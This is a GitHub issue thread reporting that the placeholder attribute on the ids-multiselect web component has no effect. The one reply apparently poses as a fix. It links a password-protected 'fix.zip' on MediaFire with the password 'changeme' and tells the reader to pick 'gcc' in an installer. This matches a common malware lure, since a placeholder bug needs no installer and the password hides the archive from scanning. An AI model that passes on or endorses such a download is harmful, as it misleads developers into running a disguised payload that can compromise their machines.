### ISSUE TITLE
IdsMultiselect: not placeholder option to set, or does not work

### ISSUE THREAD

**Issue by guoliang** [infor-design/enterprise-wc#2758]
**Describe the bug**
Setting `placeholder` doesn't do anything
```html
<ids-multiselect placeholder="value"></ids-multiselect>
```

**Expected behavior**
Should render a placeholder similar to how it is in `IdsInput`, `IdsDropdown`

**Version**

- ids-enterprise: 1.4.2

**Comment by NaiveShiki** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
